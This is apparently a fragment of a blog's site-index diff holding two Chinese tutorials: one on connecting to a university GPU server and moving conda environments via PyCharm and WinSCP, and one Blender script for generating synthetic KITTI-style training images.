    print(flag)
    ngpu = 1
    # Decide which device we want to run on
    device = torch.device("cuda:0" if (torch.cuda.is_available() and ngpu > 0) else "cpu")
    print(device)
    print(torch.cuda.get_device_name(0))
    print(torch.rand(3,3).cuda())

    开跑!

    ​ 在 PyCharm 专业版中设置解释器,On SSH...

    png

    ​ 设置对应的参数:

    • Host10.188.65.154
    • Port22
    • Usernameguanz

    png

    ​ 设置相应的密码:

    png

    ​ 设置相应的解释器:/home/guanz/anaconda3/envs/pytorch/bin/python

    png

    ​ 开跑!可以看到可以跑,但是显存全被伟哥占光了orz

    True
    cuda:0
    NVIDIA GeForce RTX 3080
    Traceback (most recent call last):
    File "/tmp/pycharm_project_2/testGpu.py", line 10, in <module>
    print(torch.rand(3,3).cuda())
    RuntimeError: CUDA error: out of memory
    CUDA kernel errors might be asynchronously reported at some other API call,so the stacktrace below might be incorrect.
    For debugging consider passing CUDA_LAUNCH_BLOCKING=1.

    Process finished with exit code 1

    代码同步

    DeploymentConfiguration

    png

    ​ 设置 Connection

    png

    ​ 设置 Mappings

    • Local path:本地目录
    • Deployment path:服务器目录

    png

    ​ 设置好后,就可以进行 UploadDownload 等操作:

    png

    Options 中如果将 Upload changed filesautomatically to the default server 设为 On explicit save action (Ctrl+S),则可以在每次保存的时候就上传代码:

    png

    Winscp

    png

    ​ Winscp 软件可以很方便从本机和服务器之前传输文件。

    如果我润回家了还想用冀大服务器怎么办

    冀大 VPN

    ​ 得用这个 河北大学校园网VPN系统 (hbu.cn) 但是好像不知道密码,寄!

    ​ 还是找人帮忙开机吧……谢谢伟哥!

    ]]>
    + 正文

    准备

    png

    ​ 下载 MobaXterm:https://en.softonic.com/download/moba/windows/post-download

    登录

    ​ MobaXterm 下 Session,打开 Session settingsRemote host 中输入 10.188.65.154Specify username 中输入自己的用户名,Port22,不变。

    Remote environment 默认选择的是 Interactive shell,如果选择 Gnome desktop 则会打开 Ubuntu 的可视化界面。

    png

    png

    ​ 进服务器:

    png

    常见命令

    who

    ​ 查看现在谁在线:

    1
    who
    1
    2
    3
    4
    5
    6
    7
    8
    伟哥   pts/0        2023-06-24 09:53 (10.62.62.XXX)
    伟哥 pts/1 2023-06-24 09:59 (10.62.62.XXX)
    伟哥 pts/2 2023-06-25 08:26 (10.62.62.XXX)
    guanz pts/3 2023-06-25 19:43 (10.91.140.XXX)
    伟哥 pts/4 2023-06-23 08:17 (10.62.62.XXX)
    伟哥 pts/5 2023-06-23 15:48 (10.62.62.XXX)
    伟哥 pts/6 2023-06-23 15:36 (10.61.20.XXX)
    伟哥 pts/8 2023-06-23 15:56 (10.61.20.XXX)

    nvidia-smi

    ​ 查看显卡状态:

    1
    nvidia-smi
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    Sun Jun 25 20:11:14 2023
    +-----------------------------------------------------------------------------+
    | NVIDIA-SMI 510.85.02 Driver Version: 510.85.02 CUDA Version: 11.6 |
    |-------------------------------+----------------------+----------------------+
    | GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |
    | Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |
    | | | MIG M. |
    |===============================+======================+======================|
    | 0 NVIDIA GeForce ... Off | 00000000:65:00.0 Off | N/A |
    | 30% 58C P2 104W / 320W | 9514MiB / 10240MiB | 19% Default |
    | | | N/A |
    +-------------------------------+----------------------+----------------------+

    +-----------------------------------------------------------------------------+
    | Processes: |
    | GPU GI CI PID Type Process name GPU Memory |
    | ID ID Usage |
    |=============================================================================|
    | 0 N/A N/A 1348 G /usr/lib/xorg/Xorg 9MiB |
    | 0 N/A N/A 1614 G /usr/bin/gnome-shell 6MiB |
    | 0 N/A N/A 3562342 C python 5767MiB |
    | 0 N/A N/A 3567780 C python 3727MiB |
    +-----------------------------------------------------------------------------+

    ps

    ​ 可以看到 PID 3562342 在使用,查看使用用户:

    1
    ps -f -p 3562342
    1
    2
    UID          PID    PPID  C STIME TTY          TIME CMD
    伟哥 3562342 3542160 99 09:33 ? 10:42:43 python occupyGPU_5G.py

    服务器联网

    firefox

    ​ 登陆校园网,打开火狐浏览器:

    1
    firefox

    ​ 地址栏输入 202.206.1.231,登录校园网,即可联网。

    png

    ping

    ​ 检查服务器是否连上校园网:

    1
    ping www.baidu.com
    1
    2
    3
    4
    5
    PING www.a.shifen.com (220.181.38.150) 56(84) bytes of data.
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=1 ttl=51 时间=9.12 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=2 ttl=51 时间=9.05 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=3 ttl=51 时间=9.02 毫秒
    64 比特,来自 220.181.38.150 (220.181.38.150): icmp_seq=4 ttl=51 时间=9.03 毫秒

    服务器上安装 anaconda

    ​ 从 Index of /anaconda/archive/ | 清华大学开源软件镜像站 | Tsinghua Open Source Mirror 里下载想要的 conda 版本:Anaconda3-2023.03-Linux-x86_64.sh,拷贝到服务器目录:

    png

    ​ 卸载旧的 Anaconda:

    1
    rm -rf ~/anaconda3

    ​ 删除其它文件:

    1
    rm -rf ~/.condarc ~/.conda

    ​ 安装之:

    1
    chmod u+x Anaconda3-2023.03-Linux-x86_64.sh
    1
    bash ./Anaconda3-2023.03-Linux-x86_64.sh

    ​ 修正 .bashrc 中有关 conda 的部分:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    export PATH=$PATH:/usr/bin/:$PATH
    # >>> conda initialize >>>
    # !! Contents within this block are managed by 'conda init' !!
    __conda_setup="$('/home/guanz/anaconda3/bin/conda' 'shell.bash' 'hook' 2> /dev/null)"
    if [ $? -eq 0 ]; then
    eval "$__conda_setup"
    else
    if [ -f "/home/guanz/anaconda3/etc/profile.d/conda.sh" ]; then
    . "/home/guanz/anaconda3/etc/profile.d/conda.sh" # commented out by conda initialize
    else
    export PATH="/home/zhij/anaconda3/bin:$PATH" # commented out by conda initialize
    fi
    fi
    unset __conda_setup

    ​ 从根目录下 .condarc 下设置镜像(写博客的这天清华镜像好像寄了,换阿里):

    1
    2
    3
    4
    5
    ssl_verify: False
    channels:
    - https://mirrors.aliyun.com/anaconda/pkgs/free/
    - https://mirrors.aliyun.com/anaconda/pkgs/main/
    show_channel_urls: True

    在服务器安装 conda 环境

    conda create

    ​ 设置好镜像后,此时才可以创建虚拟环境,不然容易寄。

    1
    conda create -n blender python=3.9

    conda info --envs

    ​ 查看环境信息:

    1
    conda info --envs
    1
    2
    3
    4
    5
    # conda environments:
    #
    base * /home/guanz/anaconda3
    SRNet /home/guanz/anaconda3/envs/SRNet
    blender /home/guanz/anaconda3/envs/blender

    conda remove

    ​ 移除某个环境:

    1
    conda remove -n XXX --all

    pip install

    1
    pip install pillow -i https://pypi.tuna.tsinghua.edu.cn/simple

    ​ 如果清华镜像寄了,就试试阿里镜像:

    1
    pip install pillow -i https://mirrors.aliyun.com/pypi/simple/

    将本地环境迁移到服务器上

    ​ 如果在学校服务器上安装环境过于麻烦,可以考虑在 win11 下的 ubuntu 子系统下先装好对应的环境,然后将这个环境迁移至服务器上,我们以一个 pytorch 的环境为例。


    ​ 先在本机上整一个带 pytorch 1.13.1,cuda 11.6 的镜像(学校的服务器 cuda 是 11.6 的)

    ​ 从 download.pytorch.org/whl/torch_stable.html 下载 torch-1.13.1+cu116-cp39-cp39-linux_x86_64.whltorchvision-0.14.1+cu116-cp39-cp39-linux_x86_64.whl

    1
    2
    3
    4
    conda create -n pytorch python=3.9
    conda activate pytorch
    pip install torch-1.13.1+cu116-cp39-cp39-linux_x86_64.whl -i https://mirrors.aliyun.com/pypi/simple/
    pip install torchvision-0.14.1+cu116-cp39-cp39-linux_x86_64.whl -i https://mirrors.aliyun.com/pypi/simple/

    conda pack

    ​ 将虚拟环境 pytorch 打包成 pytorch.tar.gz 并保存到当前目录中。

    1
    conda pack -n pytorch -o pytorch.tar.gz

    将生成的 pytorch.tar.gz 拷贝到服务器。

    ​ 在服务器根目录下:

    1
    2
    cd ./anaconda3/envs
    mkdir -p pytorch

    ​ 将 pytorch.tar.gz 里的内容解压到 ./anaconda3/envs/pytorch/ 中:

    1
    tar -xzf ../../pytorch.tar.gz -C pytorch

    ​ 查看是否迁移完成:

    1
    conda env list
    1
    2
    base                  *  /home/guanz/anaconda3
    pytorch /home/guanz/anaconda3/envs/pytorch

    ​ 查看环境是否可以使用:

    1
    2
    3
    4
    5
    6
    7
    python
    Python 3.9.16 (main, May 15 2023, 23:46:34)
    [GCC 11.2.0] :: Anaconda, Inc. on linux
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import torch
    >>> import torchvision
    >>> torch.cuda.is_available()
    1
    True

    PyCharm 连接服务器

    ​ 新建一个项目testGpu,里面有一个 .py 文件 testGpu.py

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import torch

    flag = torch.cuda.is_available()
    print(flag)
    ngpu = 1
    # Decide which device we want to run on
    device = torch.device("cuda:0" if (torch.cuda.is_available() and ngpu > 0) else "cpu")
    print(device)
    print(torch.cuda.get_device_name(0))
    print(torch.rand(3,3).cuda())

    开跑!

    ​ 在 PyCharm 专业版中设置解释器,On SSH...

    png

    ​ 设置对应的参数:

    • Host10.188.65.154
    • Port22
    • Usernameguanz

    png

    ​ 设置相应的密码:

    png

    ​ 设置相应的解释器:/home/guanz/anaconda3/envs/pytorch/bin/python

    png

    ​ 开跑!可以看到可以跑,但是显存全被伟哥占光了orz

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    True
    cuda:0
    NVIDIA GeForce RTX 3080
    Traceback (most recent call last):
    File "/tmp/pycharm_project_2/testGpu.py", line 10, in <module>
    print(torch.rand(3,3).cuda())
    RuntimeError: CUDA error: out of memory
    CUDA kernel errors might be asynchronously reported at some other API call,so the stacktrace below might be incorrect.
    For debugging consider passing CUDA_LAUNCH_BLOCKING=1.

    Process finished with exit code 1

    代码同步

    DeploymentConfiguration

    png

    ​ 设置 Connection

    png

    ​ 设置 Mappings

    • Local path:本地目录
    • Deployment path:服务器目录

    png

    ​ 设置好后,就可以进行 UploadDownload 等操作:

    png

    Options 中如果将 Upload changed filesautomatically to the default server 设为 On explicit save action (Ctrl+S),则可以在每次保存的时候就上传代码:

    png

    Winscp

    png

    ​ Winscp 软件可以很方便从本机和服务器之前传输文件。

    如果我润回家了还想用冀大服务器怎么办

    冀大 VPN

    ​ 得用这个 河北大学校园网VPN系统 (hbu.cn) 但是好像不知道密码,寄!

    ​ 还是找人帮忙开机吧……谢谢伟哥!

    ]]>
    @@ -6043,7 +6043,7 @@ /posts/Diary-%E6%83%B3%E6%B6%A6%E4%BA%86%E7%9A%84%E7%AC%AC%2017%20%E5%91%A8%E5%92%8C%E7%AC%AC%2018%20%E5%91%A8/ -
    ]]>
    +
    ]]>
    @@ -6097,7 +6097,7 @@ /posts/Blender-Datasets-auto-generator-based-on-Blender/ - 资源

    代码

    Config

    import bpy
    import math, mathutils
    import os, random
    import json
    import numpy as np

    mode = 'train' # FLAGS : train or val
    worldPath = 'pathToYourBackgrounds/'
    objsPath = 'pathToYour3DObjso/'
    imgPath = f'/home/xxx/Documents/myDataset/images/{mode}/'
    labelPath = f'/home/xxx/Documents/myDataset/labels/{mode}/'
    kittiCalibsPath = '/home/xxx/Documents/myDataset/kittiCalibs/'
    kittiLabelsPath = '/home/xxx/Documents/myDataset/kittiLabels/'

    picsNum = 2000
    # Number of objects in a scene
    objsNum = 4
    if objsNum > len(os.listdir(objsPath)):
    objsNum = len(os.listdir(objsPath))
    cameraLens = 15 # 相机焦距
    img_w = 960
    img_h = 540
    # Worlds changing frequency
    freq_CTW = 10
    objNameList = []

    main()

    1. 函数 clearAll(): 清空场景中所有的对象。
    2. 函数 loadWorlds(): 加载不同的场景环境。
    3. 函数 loadObjs(): 加载需要渲染的物体。
    4. 函数 loadCamera(): 加载摄像机。
    5. scene.camera = scene.objects['Camera']: 将场景中的相机设置为所加载的相机。
    6. scene.render.resolution_xscene.render.resolution_y: 分别设置输出图像的宽度和高度。
    7. 函数 K = calibCamera(): 计算相机内部参数,即相机的内参矩阵。
    8. 函数 changeTheWorld(): 改变场景环境(比如更改场景光照等),使得每张图片看起来不完全一样。
    9. for i in range(picsNum): 循环输出多张图片。
    10. 函数 changeObjs(): 改变场景中的物体位置和姿态,使得每张图片中物体的位置和姿态发生变换。
    11. 函数 bougeLe(): 让场景中的物体随机移动一定距离(模拟物体在真实场景中的运动)。
    12. 函数 snapIt(scene, i): 对场景进行拍照,生成一张渲染后的图像。
    13. calId = f'{kittiCalibsPath}{i}.txt': 生成保存相机内参矩阵的文件名。
    14. with open(calId,'w',encoding='utf-8') as fc:: 打开一个文件进行写入相机内参矩阵。
    15. for p in K: fc.writelines(p): 写入相机内参矩阵。
    16. clearAll(): 清空场景中所有的对象。

    其中,labelIt(i) 这一部分是待实现的标注代码,用于对生成的渲染图像进行标注。

    def main():
    clearAll()
    loadWorlds()
    loadObjs()
    loadCamera()
    scene = bpy.context.scene # 获取当前场景
    scene.camera = scene.objects['Camera'] # 将场景中的相机设置为所加载的相机
    scene.render.resolution_x = img_w # 设置输出图像的宽度
    scene.render.resolution_y = img_h # 设置输出图像的高度
    K = calibCamera() # 计算相机内部参数,即相机的内参矩阵
    changeTheWorld() # 改变场景环境(比如更改场景光照等),使得每张图片看起来不完全一样
    for i in range(picsNum): # 循环输出多张图片
    if i % freq_CTW == 0:
    changeTheWorld()
    changeObjs() # 改变场景中的物体位置和姿态,使得每张图片中物体的位置和姿态发生变换
    bougeLe() # 让场景中的物体随机移动一定距离(模拟物体在真实场景中的运动)
    snapIt(scene, i) # 对场景进行拍照,生成一张渲染后的图像
    labelIt(i) # <- TODO
    calId = f'{kittiCalibsPath}{i}.txt' # 写入参数
    with open(calId,'w',encoding='utf-8') as fc:
    for p in K:
    fc.writelines(p)
    #clearAll()
    if __name__ == '__main__':
    main()

    clearAll()

    删除场景中的所有对象:

    def clearAll():
    for obj in bpy.data.objects:
    bpy.data.objects.remove(obj)
    for img in bpy.data.images:
    bpy.data.images.remove(img)
    for ma in bpy.data.materials:
    bpy.data.materials.remove(ma)
    for me in bpy.data.meshes:
    bpy.data.meshes.remove(me)
    for ng in bpy.data.node_groups:
    bpy.data.node_groups.remove(ng)
    for cd in bpy.data.cameras:
    bpy.data.cameras.remove(cd)

    loadWorlds()

    world 是一系列 *.hdr 文件并存放在 worldPath 中,加载它们:

    def loadWorlds():
    world = bpy.context.scene.world
    world.use_nodes = True
    enode = bpy.context.scene.world.node_tree.nodes.new('ShaderNodeTexEnvironment')
    worldFiles = os.listdir(worldPath)
    for file in worldFiles:
    bpy.data.images.load(worldPath + file)

    loadObjs()

    objs 是一系列 *.blend 文件并存放在 objsPath 中,加载它们:

    def loadObjs():
    objsList = os.listdir(objsPath)
    for objName in objsList:
    file_path = os.path.join(objsPath, objName)
    objN = objName.split('.')[0] # 获取物体名称(去除后缀)
    objNameList.append(objN) # 将物体名称添加到物体名称列表中
    # 加载 .obj 文件并将其中包含的物体(对象)添加到当前场景中
    with bpy.data.libraries.load(file_path,link=False) as (data_from, data_to):
    # 只将以当前物体名称开头的对象添加到当前场景中,避免将不需要的对象添加到场景中
    data_to.objects = [name for name in data_from.objects if name.startswith(objN)]
    # 该部分是注释掉的代码,原本是想将已经加载的物体名称保存到 YAML 文件中,但是最终没有实现。
    #with open(cocoYaml,'w',encoding='utf-8') as fc:
    #yaml.dump(objNameList,fc)

    loadCamera()

    def loadCamera():
    camera_data = bpy.data.cameras.new(name='Camera') # 创建一个新的相机对象
    camera_data.lens = cameraLens # 设置相机的焦距
    camera_object = bpy.data.objects.new('Camera', camera_data) # 绑定相机对象
    camera_object.rotation_euler[0] = math.pi / 2 # 使相机的 Z 轴朝向场景中的物体(而非朝上)
    bpy.context.scene.collection.objects.link(camera_object) # 将相机对象添加到场景中
    for obj in bpy.data.objects: # 循环遍历场景中的所有对象
    if obj.name != 'Camera': # 如果对象名称不是相机,则将其添加为相机的子对象,使得在相机移动时,所有与之相关的对象也会跟着移动
    obj.parent = bpy.data.objects['Camera']

    calibCamera()

    def calibCamera():
    # 获取场景中名为 Camera 的相机对象,并获取该相机的数据对象
    cam = bpy.data.objects['Camera']
    camd = cam.data
    # 获取相机的焦距(单位:毫米)
    f_in_mm = camd.lens
    # 获取场景的参数,包括图像分辨率和缩放比例。
    # 其中 resolution_x_in_px 和 resolution_y_in_px 分别表示图像的宽度和高度(单位:像素),而 scale 表示缩放比例
    scene = bpy.context.scene
    resolution_x_in_px = scene.render.resolution_x
    resolution_y_in_px = scene.render.resolution_y
    scale = scene.render.resolution_percentage / 100
    # 获取相机的传感器宽度和高度(单位:毫米),以及像素纵横比
    sensor_width_in_mm = camd.sensor_width
    sensor_height_in_mm = camd.sensor_height
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    # 如果相机的传感器安装方式是垂直(即竖放),则传感器高度为固定值,宽度会随着像素纵横比的变化而变化;否则,传感器宽度为固定值,高度会随着像素纵横比的变化而变化
    if (camd.sensor_fit == 'VERTICAL'):
    # the sensor height is fixed (sensor fit is horizontal),
    # the sensor width is effectively changed with the pixel aspect ratio
    # 根据相机的传感器大小以及像素纵横比等参数,计算出两个尺度参数 s_u 和 s_v
    s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
    s_v = resolution_y_in_px * scale / sensor_height_in_mm
    else: # 'HORIZONTAL' and 'AUTO'
    # the sensor width is fixed (sensor fit is horizontal),
    # the sensor height is effectively changed with the pixel aspect ratio
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    s_u = resolution_x_in_px * scale / sensor_width_in_mm
    s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm

    # Parameters of intrinsic calibration matrix K
    # 计算出相机的内参矩阵 K 中的元素,并分别放在 alpha_u、alpha_v、u_0、v_0 和 skew 变量中
    alpha_u = f_in_mm * s_u
    alpha_v = f_in_mm * s_v
    u_0 = resolution_x_in_px * scale / 2
    v_0 = resolution_y_in_px * scale / 2
    skew = 0 # only use rectangular pixels
    # K = Matrix(
    # ((alpha_u, skew, u_0),
    # ( 0 , alpha_v, v_0),
    # ( 0 , 0, 1 )))
    # 将内参矩阵 K 的各个元素和其他参数组成了一个矩阵(实际上只使用了矩阵中的第三行),并存储在名为 calList 的列表中。其中用到了 f-string 来方便地生成字符串。
    calList = [[f'P0: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'P1: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'P2: {alpha_u} {skew} {u_0} 0.0 0.0 {alpha_v} {v_0} 0.0 0.0 0.0 1.0 0.0\n'],
    [f'P3: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'R0_rect: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'Tr_velo_to_cam: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'Tr_imu_to_velo: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n']]
    return calList

    changeTheWorld()

    def changeTheWorld():
    while True:
    # 随机选择一张 hdr 贴图
    wd = random.choice(bpy.data.images)
    if wd.name.endswith('hdr'):
    break
    # 将其设置为环境纹理贴图
    bpy.context.scene.world.node_tree.nodes['Environment Texture'].image = wd

    changeObjs()

    def changeObjs():
    # 遍历场景中的所有物体,将它们从当前激活的 collection 中删除,除了名为 "Camera" 的相机
    for obj in bpy.context.collection.objects:
    if obj.name != 'Camera':
    bpy.context.collection.objects.unlink(obj)
    # 定义一个空列表 nameList
    nameList = []
    # 使用 while 循环随机选择场景中的物体,直到选择的数量达到 objsNum(objsNum 是一个变量,需要在函数之外定义),并将其添加到当前激活的 collection 中
    while len(nameList) < objsNum:
    obj = random.choice(bpy.data.objects)
    if not (obj.name in nameList) and obj.name != 'Camera':
    bpy.context.collection.objects.link(obj)
    nameList.append(obj.name)

    bougeLe()

    def bougeLe():
    # 遍历场景中的所有物体,对于除了名为 "Camera" 的相机对象之外的所有对象,将其选中,然后使用 while 循环计算一个比例尺来设置对象的位置
    for obj in bpy.data.objects:
    if obj.name != 'Camera':
    obj.select_set(True)
    # 使用 while 循环是因为在某些情况下,计算比例尺可能会出现异常而导致程序崩溃,因此使用 try 和 excerpt 语句可以让程序不断地重试直到成功为止
    while True:
    try:
    scale = math.sqrt(max(obj.dimensions)) * bpy.data.objects['Camera'].data.lens
    obj.location = (0, 0, -0.08 * scale)
    break
    excerpt:
    continue
    # 随机变换对象的位置、旋转和缩放,并传递一些参数来控制变换的幅度和随机性
    bpy.ops.object.randomize_transform(random_seed = random.randint(0, 100), loc=(0.24, 0.1, 0.05), rot=(3, 3, 3), scale=(1, 1, 1))
    else:
    # 对于名为 "Camera" 的相机对象,使用 random.uniform 方法生成随机的旋转角度,并将其赋值给对象的 Z 轴旋转角度,以模拟相机的扫描动态
    obj.rotation_euler[2] = 4 * random.uniform(-0.7, 0.7)

    snapIt()

    def snapIt(scene, idNum):
    for obj in bpy.data.objects:
    if obj.name != 'Camera':
    # 只选择相机
    obj.select_set(False)
    # 是通过将 imgPath 和 idNum 进行字符串拼接而得到的文件路径和文件名,用于保存渲染图像
    imId = f'{imgPath}{idNum}.png'
    scene.render.filepath = (imId)
    # 调用 bpy.ops.render.render 方法对场景进行渲染,最终将渲染结果保存为一个 PNG 格式的图像文件
    bpy.ops.render.render(write_still=True)
    ]]>
    + 资源

    代码

    Config

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import bpy
    import math, mathutils
    import os, random
    import json
    import numpy as np

    mode = 'train' # FLAGS : train or val
    worldPath = 'pathToYourBackgrounds/'
    objsPath = 'pathToYour3DObjso/'
    imgPath = f'/home/xxx/Documents/myDataset/images/{mode}/'
    labelPath = f'/home/xxx/Documents/myDataset/labels/{mode}/'
    kittiCalibsPath = '/home/xxx/Documents/myDataset/kittiCalibs/'
    kittiLabelsPath = '/home/xxx/Documents/myDataset/kittiLabels/'

    picsNum = 2000
    # Number of objects in a scene
    objsNum = 4
    if objsNum > len(os.listdir(objsPath)):
    objsNum = len(os.listdir(objsPath))
    cameraLens = 15 # 相机焦距
    img_w = 960
    img_h = 540
    # Worlds changing frequency
    freq_CTW = 10
    objNameList = []

    main()

    1. 函数 clearAll(): 清空场景中所有的对象。
    2. 函数 loadWorlds(): 加载不同的场景环境。
    3. 函数 loadObjs(): 加载需要渲染的物体。
    4. 函数 loadCamera(): 加载摄像机。
    5. scene.camera = scene.objects['Camera']: 将场景中的相机设置为所加载的相机。
    6. scene.render.resolution_xscene.render.resolution_y: 分别设置输出图像的宽度和高度。
    7. 函数 K = calibCamera(): 计算相机内部参数,即相机的内参矩阵。
    8. 函数 changeTheWorld(): 改变场景环境(比如更改场景光照等),使得每张图片看起来不完全一样。
    9. for i in range(picsNum): 循环输出多张图片。
    10. 函数 changeObjs(): 改变场景中的物体位置和姿态,使得每张图片中物体的位置和姿态发生变换。
    11. 函数 bougeLe(): 让场景中的物体随机移动一定距离(模拟物体在真实场景中的运动)。
    12. 函数 snapIt(scene, i): 对场景进行拍照,生成一张渲染后的图像。
    13. calId = f'{kittiCalibsPath}{i}.txt': 生成保存相机内参矩阵的文件名。
    14. with open(calId,'w',encoding='utf-8') as fc:: 打开一个文件进行写入相机内参矩阵。
    15. for p in K: fc.writelines(p): 写入相机内参矩阵。
    16. clearAll(): 清空场景中所有的对象。

    其中,labelIt(i) 这一部分是待实现的标注代码,用于对生成的渲染图像进行标注。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    def main():
    clearAll()
    loadWorlds()
    loadObjs()
    loadCamera()
    scene = bpy.context.scene # 获取当前场景
    scene.camera = scene.objects['Camera'] # 将场景中的相机设置为所加载的相机
    scene.render.resolution_x = img_w # 设置输出图像的宽度
    scene.render.resolution_y = img_h # 设置输出图像的高度
    K = calibCamera() # 计算相机内部参数,即相机的内参矩阵
    changeTheWorld() # 改变场景环境(比如更改场景光照等),使得每张图片看起来不完全一样
    for i in range(picsNum): # 循环输出多张图片
    if i % freq_CTW == 0:
    changeTheWorld()
    changeObjs() # 改变场景中的物体位置和姿态,使得每张图片中物体的位置和姿态发生变换
    bougeLe() # 让场景中的物体随机移动一定距离(模拟物体在真实场景中的运动)
    snapIt(scene, i) # 对场景进行拍照,生成一张渲染后的图像
    labelIt(i) # <- TODO
    calId = f'{kittiCalibsPath}{i}.txt' # 写入参数
    with open(calId,'w',encoding='utf-8') as fc:
    for p in K:
    fc.writelines(p)
    #clearAll()
    if __name__ == '__main__':
    main()

    clearAll()

    删除场景中的所有对象:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def clearAll():
    for obj in bpy.data.objects:
    bpy.data.objects.remove(obj)
    for img in bpy.data.images:
    bpy.data.images.remove(img)
    for ma in bpy.data.materials:
    bpy.data.materials.remove(ma)
    for me in bpy.data.meshes:
    bpy.data.meshes.remove(me)
    for ng in bpy.data.node_groups:
    bpy.data.node_groups.remove(ng)
    for cd in bpy.data.cameras:
    bpy.data.cameras.remove(cd)

    loadWorlds()

    world 是一系列 *.hdr 文件并存放在 worldPath 中,加载它们:

    1
    2
    3
    4
    5
    6
    7
    def loadWorlds():
    world = bpy.context.scene.world
    world.use_nodes = True
    enode = bpy.context.scene.world.node_tree.nodes.new('ShaderNodeTexEnvironment')
    worldFiles = os.listdir(worldPath)
    for file in worldFiles:
    bpy.data.images.load(worldPath + file)

    loadObjs()

    objs 是一系列 *.blend 文件并存放在 objsPath 中,加载它们:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def loadObjs():
    objsList = os.listdir(objsPath)
    for objName in objsList:
    file_path = os.path.join(objsPath, objName)
    objN = objName.split('.')[0] # 获取物体名称(去除后缀)
    objNameList.append(objN) # 将物体名称添加到物体名称列表中
    # 加载 .obj 文件并将其中包含的物体(对象)添加到当前场景中
    with bpy.data.libraries.load(file_path,link=False) as (data_from, data_to):
    # 只将以当前物体名称开头的对象添加到当前场景中,避免将不需要的对象添加到场景中
    data_to.objects = [name for name in data_from.objects if name.startswith(objN)]
    # 该部分是注释掉的代码,原本是想将已经加载的物体名称保存到 YAML 文件中,但是最终没有实现。
    #with open(cocoYaml,'w',encoding='utf-8') as fc:
    #yaml.dump(objNameList,fc)

    loadCamera()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    def loadCamera():
    camera_data = bpy.data.cameras.new(name='Camera') # 创建一个新的相机对象
    camera_data.lens = cameraLens # 设置相机的焦距
    camera_object = bpy.data.objects.new('Camera', camera_data) # 绑定相机对象
    camera_object.rotation_euler[0] = math.pi / 2 # 使相机的 Z 轴朝向场景中的物体(而非朝上)
    bpy.context.scene.collection.objects.link(camera_object) # 将相机对象添加到场景中
    for obj in bpy.data.objects: # 循环遍历场景中的所有对象
    if obj.name != 'Camera': # 如果对象名称不是相机,则将其添加为相机的子对象,使得在相机移动时,所有与之相关的对象也会跟着移动
    obj.parent = bpy.data.objects['Camera']

    calibCamera()

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    def calibCamera():
    # 获取场景中名为 Camera 的相机对象,并获取该相机的数据对象
    cam = bpy.data.objects['Camera']
    camd = cam.data
    # 获取相机的焦距(单位:毫米)
    f_in_mm = camd.lens
    # 获取场景的参数,包括图像分辨率和缩放比例。
    # 其中 resolution_x_in_px 和 resolution_y_in_px 分别表示图像的宽度和高度(单位:像素),而 scale 表示缩放比例
    scene = bpy.context.scene
    resolution_x_in_px = scene.render.resolution_x
    resolution_y_in_px = scene.render.resolution_y
    scale = scene.render.resolution_percentage / 100
    # 获取相机的传感器宽度和高度(单位:毫米),以及像素纵横比
    sensor_width_in_mm = camd.sensor_width
    sensor_height_in_mm = camd.sensor_height
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    # 如果相机的传感器安装方式是垂直(即竖放),则传感器高度为固定值,宽度会随着像素纵横比的变化而变化;否则,传感器宽度为固定值,高度会随着像素纵横比的变化而变化
    if (camd.sensor_fit == 'VERTICAL'):
    # the sensor height is fixed (sensor fit is horizontal),
    # the sensor width is effectively changed with the pixel aspect ratio
    # 根据相机的传感器大小以及像素纵横比等参数,计算出两个尺度参数 s_u 和 s_v
    s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
    s_v = resolution_y_in_px * scale / sensor_height_in_mm
    else: # 'HORIZONTAL' and 'AUTO'
    # the sensor width is fixed (sensor fit is horizontal),
    # the sensor height is effectively changed with the pixel aspect ratio
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    s_u = resolution_x_in_px * scale / sensor_width_in_mm
    s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm

    # Parameters of intrinsic calibration matrix K
